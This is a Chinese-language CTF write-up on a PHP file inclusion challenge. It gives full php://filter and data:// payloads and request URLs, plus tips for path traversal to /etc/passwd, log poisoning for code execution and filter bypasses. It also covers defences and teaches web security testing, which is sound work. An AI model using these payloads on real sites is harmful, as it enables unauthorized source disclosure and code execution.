PHP文件包含漏洞实战：利用伪协议读取源码

1. 文件包含漏洞实战：从原理到利用的全方位解析

在Web安全测试中，文件包含漏洞（File Inclusion）是最常见的高危漏洞之一。这种漏洞允许攻击者通过参数控制包含服务器上的任意文件，甚至执行恶意代码。今天我要分享的是一个典型的双参数文件包含漏洞案例，通过这个案例你将掌握：

• 如何识别文件包含漏洞的特征
• 利用php://filter协议读取源码的技巧
• 使用data://协议控制文件内容的方法
• 实际CTF比赛中的完整解题思路

这个案例来自"攻防世界"平台的fileclude题目，它模拟了开发者在文件处理时的常见错误配置。下面我会详细拆解每个技术环节，并分享我在实际测试中的经验技巧。

2. 漏洞环境与代码分析

2.1 题目环境概览

题目提供了一个PHP页面，核心功能涉及两个文件操作：

1. 通过include()函数包含file1指定的文件
2. 使用file_get_contents()读取file2指定的文件内容

从开发者角度看，这可能是为了实现某种文件组合展示功能。但从安全角度看，这种直接使用用户输入作为文件操作参数的做法极其危险。

2.2 关键代码逻辑分析

虽然题目没有提供完整源码，但从表现行为可以推断出类似如下的代码结构：

php复制<?php
$file1 = $_GET['file1'] ?? '';
$file2 = $_GET['file2'] ?? '';

if(!empty($file1) && !empty($file2)) {
    echo "File2内容: ".file_get_contents($file2);
    include($file1);
} else {
    show_source(__FILE__);
}
?>

这段代码存在两个致命问题：

1. 直接使用用户可控的GET参数作为文件路径，没有任何过滤
2. 同时使用了include()和file_get_contents()两种文件操作方式

注意：在实际审计中，我们常看到开发者只防护了include却忽略了file_get_contents，或者相反。这种防护不统一的情况往往成为突破口。

3. 漏洞利用的核心技术

3.1 PHP伪协议利用技巧

PHP提供了多种伪协议（Wrapper），在文件操作时可以发挥特殊作用。在这个案例中我们需要掌握两个关键协议：

3.1.1 php://filter协议

这个协议允许我们对数据流进行过滤处理，常用形式：

code复制php://filter/convert.base64-encode/resource=文件名

它的工作原理是：

1. 读取指定资源文件的内容
2. 通过base64编码转换内容
3. 返回编码后的结果

这种编码可以绕过PHP解释器的执行，直接获取文件源码。例如读取flag.php：

code复制php://filter/convert.base64-encode/resource=flag.php

3.1.2 data://协议

这个协议允许我们直接内联（inline）数据，格式为：

code复制data://text/plain,内容
或
data://text/plain;base64,Base64编码内容

例如要输出"hello ctf"：

code复制data://text/plain,hello ctf

3.2 双参数协同利用策略

题目要求同时满足两个条件：

1. 通过file_get_contents($file2)输出"hello ctf"
2. 通过include($file1)输出flag.php的源码

这需要我们对两个参数进行协同利用：

1. 对file2使用data协议直接控制输出内容：

   code复制file2=data://text/plain,hello ctf
   

2. 对file1使用filter协议读取flag.php：

   code复制file1=php://filter/convert.base64-encode/resource=flag.php
   

最终组合的Payload为：

code复制?file1=php://filter/convert.base64-encode/resource=flag.php&file2=data://text/plain,hello ctf

4. 实战操作与结果分析

4.1 完整利用步骤

1. 构造Payload：
   使用URL编码确保特殊字符正确传输：

   code复制file1=php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Dflag.php
   file2=data%3A%2F%2Ftext%2Fplain%2Chello%20ctf
   

2. 发送请求：
   通过浏览器或工具发送GET请求：

   code复制GET /vuln.php?file1=php://filter/convert.base64-encode/resource=flag.php&file2=data://text/plain,hello ctf HTTP/1.1
   Host: example.com
   

3. 解码结果：
   服务器会返回：

   • "hello ctf"的明文显示
   • flag.php的base64编码内容

   使用base64解码获取flag.php源码：

   bash复制echo "PD9waHAKJGZsYWcgPSAiZmxhZ3t0aGlzX2lzX2FfZmFrZV9mbGFnfSI7Cj8+" | base64 -d
   

4.2 结果解读示例

假设返回的base64编码为：

code复制PD9waHAKJGZsYWcgPSAiZmxhZ3t0aGlzX2lzX2FfZmFrZV9mbGFnfSI7Cj8+

解码后得到flag.php源码：

php复制<?php
$flag = "flag{this_is_a_fake_flag}";
?>

5. 深度防御方案

5.1 安全编码实践

要防止这类漏洞，开发者应该：

1. 白名单校验：

   php复制$allowed = ['safe1.php', 'safe2.php'];
   if(!in_array(basename($file1), $allowed)) {
       die('非法文件请求');
   }
   

2. 路径固定：

   php复制$file1 = '/var/www/safe_dir/' . basename($_GET['file1']);
   

3. 禁用危险协议：
   在php.ini中配置：

   code复制allow_url_fopen = Off
   allow_url_include = Off
   

5.2 防御层设计建议

1. 应用层：

   • 对所有文件操作参数进行严格的格式检查
   • 实现文件操作审计日志

2. 系统层：

   • 使用open_basedir限制PHP可访问目录
   • 定期更新PHP版本修复协议相关漏洞

3. 架构层：

   • 对上传文件和程序文件进行物理隔离
   • 关键配置文件设置适当权限

6. 经验总结与技巧分享

在多年的安全测试中，我总结了以下文件包含漏洞的实战经验：

1. 协议组合技巧：

   • 当直接包含php文件被拦截时，尝试结合编码过滤器：

     code复制php://filter/convert.iconv.utf-8.utf-16/resource=flag.php
     

2. 路径遍历技巧：

   • 使用多个../绕过简单的目录限制：

     code复制file1=....//....//....//etc/passwd
     

3. 日志文件利用：

   • 通过包含Apache/Nginx日志实现代码执行（需知道日志路径）：

     code复制file1=/var/log/apache2/access.log
     

4. 临时文件利用：

   • 在有限制的环境下，可以尝试包含PHP临时上传文件

重要提示：在实际渗透测试中，请务必获得授权后再进行测试。未经授权的测试可能违反法律法规。

7. CTF解题思路扩展

这个案例展示了CTF中文件包含题目的典型解法。在真实比赛中，你可能会遇到以下变种：

1. 过滤绕过型：

   • 关键词被过滤时尝试大小写混用、双重编码等
   • 示例：

     code复制file1=pHp://FilTer/convert.base64-encode/resource=flag.php
     

2. 限制协议型：

   • 当data协议被禁用时，尝试使用其他协议如expect://（需特定扩展）

3. 代码审计型：

   • 需要先通过文件包含获取源码，再分析其中的其他漏洞

4. 组合利用型：

   • 结合文件上传、反序列化等其他漏洞实现最终利用

建议搭建本地测试环境，使用DVWA或WebGoat等漏洞演练平台进行练习，逐步掌握各种变种的解法。